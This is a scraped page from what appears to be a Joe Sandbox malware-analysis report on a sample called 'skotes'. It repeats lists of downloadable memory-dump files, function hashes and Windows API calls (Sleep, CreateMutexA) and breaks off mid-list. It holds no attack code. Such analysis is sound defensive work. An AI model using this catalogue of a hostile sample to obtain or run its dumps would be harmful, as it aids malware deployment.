Associated: 00000003.00000002.2135093170.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135151416.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135175194.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135197946.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135219761.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135241305.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135263120.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135289439.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135313680.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135334110.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135354988.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135391376.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135434782.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135460168.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135484161.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135506530.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135528898.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135551707.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135573278.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135620544.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135649407.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135797821.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135823880.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135855581.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135886291.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135924836.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135953206.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5b50de173e1b64473c7a5f23d78bb0e911743cec1b89d860a80a90ab08679c3e
Instruction ID: 4da254bf669ec7ade533557f120e776359cf226df77aa14525cf5d225cf8ca0e
Opcode Fuzzy Hash: 5b50de173e1b64473c7a5f23d78bb0e911743cec1b89d860a80a90ab08679c3e
Instruction Fuzzy Hash: 7C312A71A001048BEB18EB7DDDC9BEDB762EBC5324F248619E454DB2D5C7399980EB12

Function 00FBA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.2134472755.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134494920.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134570681.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134591184.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134616107.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134641725.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134664275.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134796588.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134819402.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134891398.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134932829.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134955924.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134977978.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135000432.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135022080.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135049071.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135071621.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135093170.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135151416.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135175194.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135197946.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135219761.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135241305.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135263120.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135289439.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135313680.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135334110.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135354988.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135391376.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135434782.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135460168.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135484161.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135506530.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135528898.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135551707.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135573278.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135620544.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135649407.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135797821.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135823880.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135855581.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135886291.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135924836.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135953206.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9315801a58c61369720bcba159cd97b9644d5413d791514e541cb6c3a6aa965d
Instruction ID: 819a703d4ac4a51cbd26a6b14cc2bf3d6c1772aa1c7751bf5a020fb3058296e3
Opcode Fuzzy Hash: 9315801a58c61369720bcba159cd97b9644d5413d791514e541cb6c3a6aa965d
Instruction Fuzzy Hash: A2316A71B041049BEB18EB7DCDC5BEDB762EF81320F248219E014DB2D5DB399980EB12

Function 00FB9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.2134472755.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134494920.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134570681.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134591184.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134616107.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134641725.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134664275.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134796588.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134819402.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134891398.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134932829.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134955924.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134977978.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135000432.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135022080.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135049071.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135071621.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135093170.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135151416.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135175194.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135197946.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135219761.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135241305.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135263120.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135289439.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135313680.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135334110.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135354988.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135391376.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135434782.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135460168.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135484161.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135506530.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135528898.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135551707.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135573278.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135620544.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135649407.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135797821.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135823880.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135855581.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135886291.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135924836.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135953206.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: b2811a9cca0c6cb1299f106422556d4bd727a394fb2286ad42d44f14ed372abc
Instruction ID: 8e26ffb150de1337213a323b8d173a81e41ed40ee5a9e1eca81cebfbfe9f0968
Opcode Fuzzy Hash: b2811a9cca0c6cb1299f106422556d4bd727a394fb2286ad42d44f14ed372abc
Instruction Fuzzy Hash: EF216B31B442009BFB18AB6DDCC5BADF765EBC1320F20421DE514DB2D5D7BA9980EB12

Function 00FBA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.2134472755.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134494920.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134570681.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134591184.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134616107.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134641725.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134664275.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134796588.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134819402.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134891398.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134932829.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134955924.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134977978.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135000432.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135022080.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135049071.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135071621.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135093170.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135151416.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135175194.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135197946.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135219761.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135241305.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135263120.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135289439.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135313680.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135334110.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135354988.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135391376.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135434782.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135460168.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135484161.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135506530.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135528898.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135551707.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135573278.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135620544.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135649407.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135797821.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135823880.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135855581.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135886291.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135924836.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135953206.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f126a169d79e43d052151ebb2c3b0d93ec1ba4b7a8d277c48b45a0624efcc92a
Instruction ID: 5dce85de97b9b7542a652a1eed18d331a2b64be1a8704fa5d1cc9dcb0c8794f9
Opcode Fuzzy Hash: f126a169d79e43d052151ebb2c3b0d93ec1ba4b7a8d277c48b45a0624efcc92a
Instruction Fuzzy Hash: 95213A31A442019AFB24776ECC86BEDB251AFC1310F24491BE548DA6D2DA7E9881BA53

Function 00FBA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.2134472755.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134494920.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134570681.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134591184.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134616107.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134641725.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134664275.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134796588.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134819402.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134891398.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134932829.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134955924.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134977978.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135000432.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135022080.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135049071.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135071621.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135093170.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135151416.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135175194.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135197946.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135219761.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135241305.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135263120.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135289439.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135313680.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135334110.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135354988.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135391376.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135434782.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135460168.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135484161.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135506530.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135528898.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135551707.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135573278.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135620544.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135649407.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135797821.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135823880.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135855581.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135886291.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135924836.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135953206.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: d6534f6230fbd9ba2048eb47af281576bc2f21259a2727ab0d2e572885e8e436
Instruction ID: b2cee97d283c295b296fecdbc60eb9d2fb7aea1ea1c244307461c2998e869902
Opcode Fuzzy Hash: d6534f6230fbd9ba2048eb47af281576bc2f21259a2727ab0d2e572885e8e436
Instruction Fuzzy Hash: B2219B317402009BFB18AB6DDC85BECB7A2EBD1320F24421EE414DB6D5D77AA580EB12

Non-executed Functions

Function 00FB2EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00FB2F5F
__Mtx_unlock.LIBCPMT ref: 00FB2FCC
__Cnd_broadcast.LIBCPMT ref: 00FB2FE3
__Mtx_unlock.LIBCPMT ref: 00FB30F5
__Mtx_unlock.LIBCPMT ref: 00FB319B

Memory Dump Source

Source File: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.2134472755.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134494920.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134570681.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134591184.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134616107.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134641725.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134664275.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134796588.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134819402.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134891398.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
